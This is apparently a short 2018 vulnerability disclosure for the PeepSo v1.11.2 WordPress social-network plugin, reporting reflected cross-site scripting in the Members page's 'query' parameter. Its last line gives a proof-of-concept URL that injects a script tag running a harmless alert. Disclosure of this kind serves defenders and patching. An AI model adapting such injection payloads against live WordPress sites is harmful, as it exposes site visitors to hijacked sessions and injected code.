=================================================================================== PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members" =================================================================================== ____________________________________________________________________________________ # Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members # Date: [11-09-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://wordpress.org/plugins/peepso-core/ # Plugin: PeepSo # Version: 1.11.2 # File: Members # Parameter: query # Language: This application is available in English language. # Plugin Description: PeepSo is a social network plugin for WordPress with different kinds of features, such as user profiles, user registration, and other features. ____________________________________________________________________________________ # Cross-Site Scripting Vulnerability: http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>